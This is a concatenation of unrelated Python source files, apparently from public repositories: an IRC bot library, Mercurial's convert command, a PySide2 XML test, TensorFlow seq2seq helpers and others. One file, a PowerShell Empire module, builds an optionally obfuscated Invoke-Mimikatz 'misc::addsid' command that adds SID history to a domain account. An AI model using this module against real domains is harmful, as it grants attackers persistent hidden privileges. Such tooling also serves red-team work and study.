SimpleIRCClient.__init__(self)
self.channels = IRCDict()
self.server_list = server_list
if not reconnection_interval or reconnection_interval < 0:
reconnection_interval = 2**31
self.reconnection_interval = reconnection_interval
self._nickname = nickname
self._realname = realname
for i in ["disconnect", "join", "kick", "mode",
"namreply", "nick", "part", "quit"]:
self.connection.add_global_handler(i,
getattr(self, "_on_" + i),
-10)
def _connected_checker(self):
"""[Internal]"""
if not self.connection.is_connected():
self.connection.execute_delayed(self.reconnection_interval,
self._connected_checker)
self.jump_server()
def _connect(self):
"""[Internal]"""
password = None
if len(self.server_list[0]) > 2:
password = self.server_list[0][2]
try:
self.connect(self.server_list[0][0],
self.server_list[0][1],
self._nickname,
password,
ircname=self._realname)
except ServerConnectionError:
pass
def _on_disconnect(self, c, e):
"""[Internal]"""
self.channels = IRCDict()
self.connection.execute_delayed(self.reconnection_interval,
self._connected_checker)
def _on_join(self, c, e):
"""[Internal]"""
ch = e.target()
nick = nm_to_n(e.source())
if nick == c.get_nickname():
self.channels[ch] = Channel()
self.channels[ch].add_user(nick)
def _on_kick(self, c, e):
"""[Internal]"""
nick = e.arguments()[0]
channel = e.target()
if nick == c.get_nickname():
del self.channels[channel]
else:
self.channels[channel].remove_user(nick)
def _on_mode(self, c, e):
"""[Internal]"""
modes = parse_channel_modes(" ".join(e.arguments()))
t = e.target()
if is_channel(t):
ch = self.channels[t]
for mode in modes:
if mode[0] == "+":
f = ch.set_mode
else:
f = ch.clear_mode
f(mode[1], mode[2])
else:
# Mode on self... XXX
pass
def _on_namreply(self, c, e):
"""[Internal]"""
# e.arguments()[0] == "@" for secret channels,
# "*" for private channels,
# "=" for others (public channels)
# e.arguments()[1] == channel
# e.arguments()[2] == nick list
ch = e.arguments()[1]
for nick in e.arguments()[2].split():
if nick[0] == "@":
nick = nick[1:]
self.channels[ch].set_mode("o", nick)
elif nick[0] == "+":
nick = nick[1:]
self.channels[ch].set_mode("v", nick)
self.channels[ch].add_user(nick)
def _on_nick(self, c, e):
"""[Internal]"""
before = nm_to_n(e.source())
after = e.target()
for ch in self.channels.values():
if ch.has_user(before):
ch.change_nick(before, after)
def _on_part(self, c, e):
"""[Internal]"""
nick = nm_to_n(e.source())
channel = e.target()
if nick == c.get_nickname():
del self.channels[channel]
else:
self.channels[channel].remove_user(nick)
def _on_quit(self, c, e):
"""[Internal]"""
nick = nm_to_n(e.source())
for ch in self.channels.values():
if ch.has_user(nick):
ch.remove_user(nick)
def die(self, msg="Bye, cruel world!"):
"""Let the bot die.
Arguments:
msg -- Quit message.
"""
self.connection.disconnect(msg)
sys.exit(0)
def disconnect(self, msg="I'll be back!"):
"""Disconnect the bot.
The bot will try to reconnect after a while.
Arguments:
msg -- Quit message.
"""
self.connection.disconnect(msg)
def get_version(self):
"""Returns the bot version.
Used when answering a CTCP VERSION request.
"""
return "ircbot.py by Joel Rosdahl <joel@rosdahl.net>"
def jump_server(self, msg="Changing servers"):
"""Connect to a new server, possibly disconnecting from the current.
The bot will skip to next server in the server_list each time
jump_server is called.
"""
if self.connection.is_connected():
self.connection.disconnect(msg)
self.server_list.append(self.server_list.pop(0))
self._connect()
def on_ctcp(self, c, e):
"""Default handler for ctcp events.
Replies to VERSION and PING requests and relays DCC requests
to the on_dccchat method.
"""
if e.arguments()[0] == "VERSION":
c.ctcp_reply(nm_to_n(e.source()),
"VERSION " + self.get_version())
elif e.arguments()[0] == "PING":
if len(e.arguments()) > 1:
c.ctcp_reply(nm_to_n(e.source()),
"PING " + e.arguments()[1])
elif e.arguments()[0] == "DCC" and e.arguments()[1].split(" ", 1)[0] == "CHAT":
self.on_dccchat(c, e)
def on_dccchat(self, c, e):
pass
def start(self):
"""Start the bot."""
self._connect()
SimpleIRCClient.start(self)
class IRCDict:
"""A dictionary suitable for storing IRC-related things.
Dictionary keys a and b are considered equal if and only if
irc_lower(a) == irc_lower(b)
Otherwise, it should behave exactly as a normal dictionary.
"""
def __init__(self, dict=None):
self.data = {}
self.canon_keys = {} # Canonical keys
if dict is not None:
self.update(dict)
def __repr__(self):
return repr(self.data)
def __cmp__(self, dict):
if isinstance(dict, IRCDict):
return cmp(self.data, dict.data)
else:
return cmp(self.data, dict)
def __len__(self):
return len(self.data)
def __getitem__(self, key):
return self.data[self.canon_keys[irc_lower(key)]]
def __setitem__(self, key, item):
if key in self:
del self[key]
self.data[key] = item
self.canon_keys[irc_lower(key)] = key
def __delitem__(self, key):
ck = irc_lower(key)
del self.data[self.canon_keys[ck]]
del self.canon_keys[ck]
def __iter__(self):
return iter(self.data)
def __contains__(self, key):
return self.has_key(key)
def clear(self):
self.data.clear()
self.canon_keys.clear()
def copy(self):
if self.__class__ is UserDict:
return UserDict(self.data)
import copy
return copy.copy(self)
def keys(self):
return self.data.keys()
def items(self):
return self.data.items()
def values(self):
return self.data.values()
def has_key(self, key):
return irc_lower(key) in self.canon_keys
def update(self, dict):
for k, v in dict.items():
self.data[k] = v
def get(self, key, failobj=None):
return self.data.get(key, failobj)
class Channel:
"""A class for keeping information about an IRC channel.
This class can be improved a lot.
"""
def __init__(self):
self.userdict = IRCDict()
self.operdict = IRCDict()
self.voiceddict = IRCDict()
self.modes = {}
def users(self):
"""Returns an unsorted list of the channel's users."""
return self.userdict.keys()
def opers(self):
"""Returns an unsorted list of the channel's operators."""
return self.operdict.keys()
def voiced(self):
"""Returns an unsorted list of the persons that have voice
mode set in the channel."""
return self.voiceddict.keys()
def has_user(self, nick):
"""Check whether the channel has a user."""
return nick in self.userdict
def is_oper(self, nick):
"""Check whether a user has operator status in the channel."""
return nick in self.operdict
def is_voiced(self, nick):
"""Check whether a user has voice mode set in the channel."""
return nick in self.voiceddict
def add_user(self, nick):
self.userdict[nick] = 1
def remove_user(self, nick):
for d in self.userdict, self.operdict, self.voiceddict:
if nick in d:
del d[nick]
def change_nick(self, before, after):
self.userdict[after] = 1
del self.userdict[before]
if before in self.operdict:
self.operdict[after] = 1
del self.operdict[before]
if before in self.voiceddict:
self.voiceddict[after] = 1
del self.voiceddict[before]
def set_mode(self, mode, value=None):
"""Set mode on the channel.
Arguments:
mode -- The mode (a single-character string).
value -- Value
"""
if mode == "o":
self.operdict[value] = 1
elif mode == "v":
self.voiceddict[value] = 1
else:
self.modes[mode] = value
def clear_mode(self, mode, value=None):
"""Clear mode on the channel.
Arguments:
mode -- The mode (a single-character string).
value -- Value
"""
try:
if mode == "o":
del self.operdict[value]
elif mode == "v":
del self.voiceddict[value]
else:
del self.modes[mode]
except KeyError:
pass
def has_mode(self, mode):
return mode in self.modes
def is_moderated(self):
return self.has_mode("m")
def is_secret(self):
return self.has_mode("s")
def is_protected(self):
return self.has_mode("p")
def has_topic_lock(self):
return self.has_mode("t")
def is_invite_only(self):
return self.has_mode("i")
def has_allow_external_messages(self):
return self.has_mode("n")
def has_limit(self):
return self.has_mode("l")
def limit(self):
if self.has_limit():
return self.modes[l]
else:
return None
def has_key(self):
return self.has_mode("k")
def key(self):
if self.has_key():
return self.modes["k"]
else:
return None
|
izonder/intellij-community
|
refs/heads/master
|
plugins/hg4idea/testData/bin/hgext/convert/convcmd.py
|
90
|
# convcmd - convert extension commands definition
#
# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from common import NoRepo, MissingTool, SKIPREV, mapfile
from cvs import convert_cvs
from darcs import darcs_source
from git import convert_git
from hg import mercurial_source, mercurial_sink
from subversion import svn_source, svn_sink
from monotone import monotone_source
from gnuarch import gnuarch_source
from bzr import bzr_source
from p4 import p4_source
import filemap, common
import os, shutil
from mercurial import hg, util, encoding
from mercurial.i18n import _
orig_encoding = 'ascii'
def recode(s):
if isinstance(s, unicode):
return s.encode(orig_encoding, 'replace')
else:
return s.decode('utf-8').encode(orig_encoding, 'replace')
source_converters = [
('cvs', convert_cvs, 'branchsort'),
('git', convert_git, 'branchsort'),
('svn', svn_source, 'branchsort'),
('hg', mercurial_source, 'sourcesort'),
('darcs', darcs_source, 'branchsort'),
('mtn', monotone_source, 'branchsort'),
('gnuarch', gnuarch_source, 'branchsort'),
('bzr', bzr_source, 'branchsort'),
('p4', p4_source, 'branchsort'),
]
sink_converters = [
('hg', mercurial_sink),
('svn', svn_sink),
]
def convertsource(ui, path, type, rev):
exceptions = []
if type and type not in [s[0] for s in source_converters]:
raise util.Abort(_('%s: invalid source repository type') % type)
for name, source, sortmode in source_converters:
try:
if not type or name == type:
return source(ui, path, rev), sortmode
except (NoRepo, MissingTool), inst:
exceptions.append(inst)
if not ui.quiet:
for inst in exceptions:
ui.write("%s\n" % inst)
raise util.Abort(_('%s: missing or unsupported repository') % path)
def convertsink(ui, path, type):
if type and type not in [s[0] for s in sink_converters]:
raise util.Abort(_('%s: invalid destination repository type') % type)
for name, sink in sink_converters:
try:
if not type or name == type:
return sink(ui, path)
except NoRepo, inst:
ui.note(_("convert: %s\n") % inst)
except MissingTool, inst:
raise util.Abort('%s\n' % inst)
raise util.Abort(_('%s: unknown repository type') % path)
class progresssource(object):
def __init__(self, ui, source, filecount):
self.ui = ui
self.source = source
self.filecount = filecount
self.retrieved = 0
def getfile(self, file, rev):
self.retrieved += 1
self.ui.progress(_('getting files'), self.retrieved,
item=file, total=self.filecount)
return self.source.getfile(file, rev)
def lookuprev(self, rev):
return self.source.lookuprev(rev)
def close(self):
self.ui.progress(_('getting files'), None)
class converter(object):
def __init__(self, ui, source, dest, revmapfile, opts):
self.source = source
self.dest = dest
self.ui = ui
self.opts = opts
self.commitcache = {}
self.authors = {}
self.authorfile = None
# Record converted revisions persistently: maps source revision
# ID to target revision ID (both strings). (This is how
# incremental conversions work.)
self.map = mapfile(ui, revmapfile)
# Read first the dst author map if any
authorfile = self.dest.authorfile()
if authorfile and os.path.exists(authorfile):
self.readauthormap(authorfile)
# Extend/Override with new author map if necessary
if opts.get('authormap'):
self.readauthormap(opts.get('authormap'))
self.authorfile = self.dest.authorfile()
self.splicemap = common.parsesplicemap(opts.get('splicemap'))
self.branchmap = mapfile(ui, opts.get('branchmap'))
def walktree(self, heads):
'''Return a mapping that identifies the uncommitted parents of every
uncommitted changeset.'''
visit = heads
known = set()
parents = {}
while visit:
n = visit.pop(0)
if n in known or n in self.map:
continue
known.add(n)
self.ui.progress(_('scanning'), len(known), unit=_('revisions'))
commit = self.cachecommit(n)
parents[n] = []
for p in commit.parents:
parents[n].append(p)
visit.append(p)
self.ui.progress(_('scanning'), None)
return parents
def mergesplicemap(self, parents, splicemap):
"""A splicemap redefines child/parent relationships. Check the
map contains valid revision identifiers and merge the new
links in the source graph.
"""
for c in sorted(splicemap):
if c not in parents:
if not self.dest.hascommit(self.map.get(c, c)):
# Could be in source but not converted during this run
self.ui.warn(_('splice map revision %s is not being '
'converted, ignoring\n') % c)
continue
pc = []
for p in splicemap[c]:
# We do not have to wait for nodes already in dest.
if self.dest.hascommit(self.map.get(p, p)):
continue
# Parent is not in dest and not being converted, not good
if p not in parents:
raise util.Abort(_('unknown splice map parent: %s') % p)
pc.append(p)
parents[c] = pc
def toposort(self, parents, sortmode):
'''Return an ordering such that every uncommitted changeset is
preceded by all its uncommitted ancestors.'''
def mapchildren(parents):
"""Return a (children, roots) tuple where 'children' maps parent
revision identifiers to children ones, and 'roots' is the list of
revisions without parents. 'parents' must be a mapping of revision
identifier to its parents ones.
"""
visit = sorted(parents)
seen = set()
children = {}
roots = []
while visit:
n = visit.pop(0)
if n in seen:
continue
seen.add(n)
# Ensure that nodes without parents are present in the
# 'children' mapping.
children.setdefault(n, [])
hasparent = False
for p in parents[n]:
if p not in self.map:
visit.append(p)
hasparent = True
children.setdefault(p, []).append(n)
if not hasparent:
roots.append(n)
return children, roots
# Sort functions are supposed to take a list of revisions which
# can be converted immediately and pick one
def makebranchsorter():
"""If the previously converted revision has a child in the
eligible revisions list, pick it. Return the list head
otherwise. Branch sort attempts to minimize branch
switching, which is harmful for Mercurial backend
compression.
"""
prev = [None]
def picknext(nodes):
next = nodes[0]
for n in nodes:
if prev[0] in parents[n]:
next = n
break
prev[0] = next
return next
return picknext
def makesourcesorter():
"""Source specific sort."""
keyfn = lambda n: self.commitcache[n].sortkey
def picknext(nodes):
return sorted(nodes, key=keyfn)[0]
return picknext
def makeclosesorter():
"""Close order sort."""
keyfn = lambda n: ('close' not in self.commitcache[n].extra,
self.commitcache[n].sortkey)
def picknext(nodes):
return sorted(nodes, key=keyfn)[0]
return picknext
def makedatesorter():
"""Sort revisions by date."""
dates = {}
def getdate(n):
if n not in dates:
dates[n] = util.parsedate(self.commitcache[n].date)
return dates[n]
def picknext(nodes):
return min([(getdate(n), n) for n in nodes])[1]
return picknext
if sortmode == 'branchsort':
picknext = makebranchsorter()
elif sortmode == 'datesort':
picknext = makedatesorter()
elif sortmode == 'sourcesort':
picknext = makesourcesorter()
elif sortmode == 'closesort':
picknext = makeclosesorter()
else:
raise util.Abort(_('unknown sort mode: %s') % sortmode)
children, actives = mapchildren(parents)
s = []
pendings = {}
while actives:
n = picknext(actives)
actives.remove(n)
s.append(n)
# Update dependents list
for c in children.get(n, []):
if c not in pendings:
pendings[c] = [p for p in parents[c] if p not in self.map]
try:
pendings[c].remove(n)
except ValueError:
raise util.Abort(_('cycle detected between %s and %s')
% (recode(c), recode(n)))
if not pendings[c]:
# Parents are converted, node is eligible
actives.insert(0, c)
pendings[c] = None
if len(s) != len(parents):
raise util.Abort(_("not all revisions were sorted"))
return s
def writeauthormap(self):
authorfile = self.authorfile
if authorfile:
self.ui.status(_('writing author map file %s\n') % authorfile)
ofile = open(authorfile, 'w+')
for author in self.authors:
ofile.write("%s=%s\n" % (author, self.authors[author]))
ofile.close()
def readauthormap(self, authorfile):
afile = open(authorfile, 'r')
for line in afile:
line = line.strip()
if not line or line.startswith('#'):
continue
try:
srcauthor, dstauthor = line.split('=', 1)
except ValueError:
msg = _('ignoring bad line in author map file %s: %s\n')
self.ui.warn(msg % (authorfile, line.rstrip()))
continue
srcauthor = srcauthor.strip()
dstauthor = dstauthor.strip()
if self.authors.get(srcauthor) in (None, dstauthor):
msg = _('mapping author %s to %s\n')
self.ui.debug(msg % (srcauthor, dstauthor))
self.authors[srcauthor] = dstauthor
continue
m = _('overriding mapping for author %s, was %s, will be %s\n')
self.ui.status(m % (srcauthor, self.authors[srcauthor], dstauthor))
afile.close()
def cachecommit(self, rev):
commit = self.source.getcommit(rev)
commit.author = self.authors.get(commit.author, commit.author)
commit.branch = self.branchmap.get(commit.branch, commit.branch)
self.commitcache[rev] = commit
return commit
def copy(self, rev):
commit = self.commitcache[rev]
changes = self.source.getchanges(rev)
if isinstance(changes, basestring):
if changes == SKIPREV:
dest = SKIPREV
else:
dest = self.map[changes]
self.map[rev] = dest
return
files, copies = changes
pbranches = []
if commit.parents:
for prev in commit.parents:
if prev not in self.commitcache:
self.cachecommit(prev)
pbranches.append((self.map[prev],
self.commitcache[prev].branch))
self.dest.setbranch(commit.branch, pbranches)
try:
parents = self.splicemap[rev]
self.ui.status(_('spliced in %s as parents of %s\n') %
(parents, rev))
parents = [self.map.get(p, p) for p in parents]
except KeyError:
parents = [b[0] for b in pbranches]
source = progresssource(self.ui, self.source, len(files))
newnode = self.dest.putcommit(files, copies, parents, commit,
source, self.map)
source.close()
self.source.converted(rev, newnode)
self.map[rev] = newnode
def convert(self, sortmode):
try:
self.source.before()
self.dest.before()
self.source.setrevmap(self.map)
self.ui.status(_("scanning source...\n"))
heads = self.source.getheads()
parents = self.walktree(heads)
self.mergesplicemap(parents, self.splicemap)
self.ui.status(_("sorting...\n"))
t = self.toposort(parents, sortmode)
num = len(t)
c = None
self.ui.status(_("converting...\n"))
for i, c in enumerate(t):
num -= 1
desc = self.commitcache[c].desc
if "\n" in desc:
desc = desc.splitlines()[0]
# convert log message to local encoding without using
# tolocal() because the encoding.encoding convert()
# uses is 'utf-8'
self.ui.status("%d %s\n" % (num, recode(desc)))
self.ui.note(_("source: %s\n") % recode(c))
self.ui.progress(_('converting'), i, unit=_('revisions'),
total=len(t))
self.copy(c)
self.ui.progress(_('converting'), None)
tags = self.source.gettags()
ctags = {}
for k in tags:
v = tags[k]
if self.map.get(v, SKIPREV) != SKIPREV:
ctags[k] = self.map[v]
if c and ctags:
nrev, tagsparent = self.dest.puttags(ctags)
if nrev and tagsparent:
# write another hash correspondence to override the previous
# one so we don't end up with extra tag heads
tagsparents = [e for e in self.map.iteritems()
if e[1] == tagsparent]
if tagsparents:
self.map[tagsparents[0][0]] = nrev
bookmarks = self.source.getbookmarks()
cbookmarks = {}
for k in bookmarks:
v = bookmarks[k]
if self.map.get(v, SKIPREV) != SKIPREV:
cbookmarks[k] = self.map[v]
if c and cbookmarks:
self.dest.putbookmarks(cbookmarks)
self.writeauthormap()
finally:
self.cleanup()
def cleanup(self):
try:
self.dest.after()
finally:
self.source.after()
self.map.close()
def convert(ui, src, dest=None, revmapfile=None, **opts):
global orig_encoding
orig_encoding = encoding.encoding
encoding.encoding = 'UTF-8'
# support --authors as an alias for --authormap
if not opts.get('authormap'):
opts['authormap'] = opts.get('authors')
if not dest:
dest = hg.defaultdest(src) + "-hg"
ui.status(_("assuming destination %s\n") % dest)
destc = convertsink(ui, dest, opts.get('dest_type'))
try:
srcc, defaultsort = convertsource(ui, src, opts.get('source_type'),
opts.get('rev'))
except Exception:
for path in destc.created:
shutil.rmtree(path, True)
raise
sortmodes = ('branchsort', 'datesort', 'sourcesort', 'closesort')
sortmode = [m for m in sortmodes if opts.get(m)]
if len(sortmode) > 1:
raise util.Abort(_('more than one sort mode specified'))
sortmode = sortmode and sortmode[0] or defaultsort
if sortmode == 'sourcesort' and not srcc.hasnativeorder():
raise util.Abort(_('--sourcesort is not supported by this data source'))
if sortmode == 'closesort' and not srcc.hasnativeclose():
raise util.Abort(_('--closesort is not supported by this data source'))
fmap = opts.get('filemap')
if fmap:
srcc = filemap.filemap_source(ui, srcc, fmap)
destc.setfilemapmode(True)
if not revmapfile:
try:
revmapfile = destc.revmapfile()
except Exception:
revmapfile = os.path.join(destc, "map")
c = converter(ui, srcc, destc, revmapfile, opts)
c.convert(sortmode)
|
sparkslabs/kamaelia
|
refs/heads/master
|
Sketches/TG/gui/ClassShard.py
|
15
|
# -*- coding: utf-8 -*-
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from Shard import *
import inspect
class classShard(docShard):
"""
Creates a class as a shard from given components.
Arguments:
clsname = name of class as string, defaults to None, but this must be
provided else shard Init will fail
superclasses = sequence of class names to inherit from. If empty
or unspecified, this will default to 'object'
docstring = formatted string of comments, default is empty
shards = list of shards (any of shard objects, lines of code, functions)
to form body of class, i.e. class variables and methods.
Note: methods should be given as appropriate shard objects,
function objects have the body of the function imported only
Returns:
shard object containing a definition of the class as specified
"""
# default initialisation parameters
initargs = {}
initargs['clsname'] = None
initargs['superclasses'] = []
initargs['docstring'] = ''
initargs['shards'] = []
# compulsory init parameters
required = ['clsname']
def __init__(self, clsname = None, superclasses = [], docstring = '', shards = []):
if not clsname:
raise ArgumentError, 'classname must be a non-empty string'
super(classShard, self).__init__(name = clsname, docstring = docstring,
shards = shards)
defline = self.makeclass(clsname, superclasses)
self.code = defline + self.addindent(self.docstring) + [nl] \
+ self.addindent(self.code, 1)
def makeclass(self, name, superclasses = None):
"""
Creates class statement
Arguments:
name = string of class name
superclasses = sequence of class names to inherit from. If empty
or unspecified, this will default to 'object'
Returns:
list of a single string that contains class statement
"""
str = "class " + name
if not superclasses:
return [str + "(object):"+ nl]
str += "(" + superclasses[0]
for supercls in superclasses[1:]:
str += ", " + supercls
return [str + "):" + nl]
def makeMethodShards(self, functions):
"""
Converts function objects to method shards, adds
self parameter if not present
Arguments:
functions = sequence of function or shard objects;
shards are added to output, functions
are converted to shard objects containing
code for the method
Returns:
list of shard objects corresponding to given functions
"""
mshards = []
for m in functions:
if isfunction(m):
lines = inspect.getsource(m).splitlines(True) # get code
# check for self parameter, add as necessary
if lines[0].find(m.func_name+"(self") == -1:
nm, br, argsln = lines[0].partition("(")
lines[0] = nm + br + "self, " + argsln
# make shard
m = shard(name = m.func_name, code = lines + [nl])
mshards += [m]
return mshards
|
BadSingleton/pyside2
|
refs/heads/master
|
tests/QtXml/qdomdocument_test.py
|
3
|
#!/usr/bin/python
import unittest
from PySide2.QtCore import QByteArray
from PySide2.QtXml import QDomDocument, QDomElement
class QDomDocumentTest(unittest.TestCase):
def setUp(self):
self.dom = QDomDocument()
self.goodXmlData = QByteArray('''
<typesystem package="PySide2.QtXml">
<value-type name="QDomDocument"/>
<value-type name="QDomElement"/>
</typesystem>
''')
self.badXmlData = QByteArray('''
<typesystem package="PySide2.QtXml">
<value-type name="QDomDocument">
</typesystem>
''')
def tearDown(self):
del self.dom
del self.goodXmlData
del self.badXmlData
def testQDomDocumentSetContentWithBadXmlData(self):
'''Sets invalid xml as the QDomDocument contents.'''
ok, errorStr, errorLine, errorColumn = self.dom.setContent(self.badXmlData, True)
self.assertFalse(ok)
self.assertEqual(errorStr, 'tag mismatch')
self.assertEqual(errorLine, 4)
self.assertEqual(errorColumn, 21)
def testQDomDocumentSetContentWithGoodXmlData(self):
'''Sets valid xml as the QDomDocument contents.'''
ok, errorStr, errorLine, errorColumn = self.dom.setContent(self.goodXmlData, True)
self.assert_(ok)
self.assertEqual(errorStr, '')
self.assertEqual(errorLine, 0)
self.assertEqual(errorColumn, 0)
def testQDomDocumentData(self):
'''Checks the QDomDocument elements for the valid xml contents.'''
def checkAttribute(element, attribute, value):
self.assert_(isinstance(root, QDomElement))
self.assertFalse(element.isNull())
self.assert_(element.hasAttribute(attribute))
self.assertEqual(element.attribute(attribute), value)
ok, errorStr, errorLine, errorColumn = self.dom.setContent(self.goodXmlData, True)
root = self.dom.documentElement()
self.assertEqual(root.tagName(), 'typesystem')
checkAttribute(root, 'package', 'PySide2.QtXml')
child = root.firstChildElement('value-type')
checkAttribute(child, 'name', 'QDomDocument')
child = child.nextSiblingElement('value-type')
checkAttribute(child, 'name', 'QDomElement')
if __name__ == '__main__':
unittest.main()
|
bkirui/odoo
|
refs/heads/8.0
|
addons/google_calendar/controllers/__init__.py
|
7372
|
import main
|
PowerShellEmpire/Empire
|
refs/heads/master
|
lib/modules/powershell/persistence/misc/add_sid_history.py
|
10
|
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-Mimikatz Add-SIDHistory',
'Author': ['@JosephBialek', '@gentilkiwi'],
'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
"to execute misc::addsid to add sid history for a user. "
"ONLY APPLICABLE ON DOMAIN CONTROLLERS!"),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : True,
'OpsecSafe' : False,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [
'http://clymb3r.wordpress.com/',
'http://blog.gentilkiwi.com'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'User' : {
'Description' : 'User to add sidhistory for.',
'Required' : True,
'Value' : ''
},
'Groups' : {
'Description' : 'Groups/users to add to the sidhistory of the target user (COMMA-separated).',
'Required' : True,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
# ridiculous escape format
groups = " ".join(['"\\""'+group.strip().strip("'\"")+'"""' for group in self.options["Groups"]['Value'].split(",")])
# build the custom command with whatever options we want
command = '""misc::addsid '+self.options["User"]['Value'] + ' ' + groups
# base64 encode the command to pass to Invoke-Mimikatz
scriptEnd = "Invoke-Mimikatz -Command '\"" + command + "\"';"
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
|
ageron/tensorflow
|
refs/heads/master
|
tensorflow/contrib/seq2seq/python/ops/helper.py
|
11
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A library of helpers for use with SamplingDecoders.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import six
from tensorflow.contrib.seq2seq.python.ops import decoder
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import embedding_ops
from tensorflow.python.ops import gen_array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.util import nest
__all__ = [
"Helper",
"TrainingHelper",
"GreedyEmbeddingHelper",
"SampleEmbeddingHelper",
"CustomHelper",
"ScheduledEmbeddingTrainingHelper",
"ScheduledOutputTrainingHelper",
"InferenceHelper",
]
_transpose_batch_time = decoder._transpose_batch_time # pylint: disable=protected-access
# The following sample functions (_call_sampler, bernoulli_sample,
# categorical_sample) mimic TensorFlow Probability distribution semantics.
def _call_sampler(sample_n_fn, sample_shape, name=None):
"""Reshapes vector of samples."""
with ops.name_scope(name, "call_sampler", values=[sample_shape]):
sample_shape = ops.convert_to_tensor(
sample_shape, dtype=dtypes.int32, name="sample_shape")
# Ensure sample_shape is a vector (vs just a scalar).
pad = math_ops.cast(math_ops.equal(array_ops.rank(sample_shape), 0),
dtypes.int32)
sample_shape = array_ops.reshape(
sample_shape,
array_ops.pad(array_ops.shape(sample_shape),
paddings=[[pad, 0]],
constant_values=1))
samples = sample_n_fn(math_ops.reduce_prod(sample_shape))
batch_event_shape = array_ops.shape(samples)[1:]
final_shape = array_ops.concat([sample_shape, batch_event_shape], 0)
return array_ops.reshape(samples, final_shape)
def bernoulli_sample(probs=None, logits=None, dtype=dtypes.int32,
sample_shape=(), seed=None):
"""Samples from Bernoulli distribution."""
if probs is None:
probs = math_ops.sigmoid(logits, name="probs")
else:
probs = ops.convert_to_tensor(probs, name="probs")
batch_shape_tensor = array_ops.shape(probs)
def _sample_n(n):
"""Sample vector of Bernoullis."""
new_shape = array_ops.concat([[n], batch_shape_tensor], 0)
uniform = random_ops.random_uniform(
new_shape, seed=seed, dtype=probs.dtype)
return math_ops.cast(math_ops.less(uniform, probs), dtype)
return _call_sampler(_sample_n, sample_shape)
def categorical_sample(logits, dtype=dtypes.int32,
sample_shape=(), seed=None):
"""Samples from categorical distribution."""
logits = ops.convert_to_tensor(logits, name="logits")
event_size = array_ops.shape(logits)[-1]
batch_shape_tensor = array_ops.shape(logits)[:-1]
def _sample_n(n):
"""Sample vector of categoricals."""
if logits.shape.ndims == 2:
logits_2d = logits
else:
logits_2d = array_ops.reshape(logits, [-1, event_size])
sample_dtype = dtypes.int64 if logits.dtype.size > 4 else dtypes.int32
draws = random_ops.multinomial(
logits_2d, n, seed=seed, output_dtype=sample_dtype)
draws = array_ops.reshape(
array_ops.transpose(draws),
array_ops.concat([[n], batch_shape_tensor], 0))
return math_ops.cast(draws, dtype)
return _call_sampler(_sample_n, sample_shape)
def _unstack_ta(inp):
return tensor_array_ops.TensorArray(
dtype=inp.dtype, size=array_ops.shape(inp)[0],
element_shape=inp.get_shape()[1:]).unstack(inp)
@six.add_metaclass(abc.ABCMeta)
class Helper(object):
"""Interface for implementing sampling in seq2seq decoders.
Helper instances are used by `BasicDecoder`.
"""
@abc.abstractproperty
def batch_size(self):
"""Batch size of tensor returned by `sample`.
Returns a scalar int32 tensor.
"""
raise NotImplementedError("batch_size has not been implemented")
@abc.abstractproperty
def sample_ids_shape(self):
"""Shape of tensor returned by `sample`, excluding the batch dimension.
Returns a `TensorShape`.
"""
raise NotImplementedError("sample_ids_shape has not been implemented")
@abc.abstractproperty
def sample_ids_dtype(self):
"""DType of tensor returned by `sample`.
Returns a DType.
"""
raise NotImplementedError("sample_ids_dtype has not been implemented")
@abc.abstractmethod
def initialize(self, name=None):
"""Returns `(initial_finished, initial_inputs)`."""
pass
@abc.abstractmethod
def sample(self, time, outputs, state, name=None):
"""Returns `sample_ids`."""
pass
@abc.abstractmethod
def next_inputs(self, time, outputs, state, sample_ids, name=None):
"""Returns `(finished, next_inputs, next_state)`."""
pass
class CustomHelper(Helper):
"""Base abstract class that allows the user to customize sampling."""
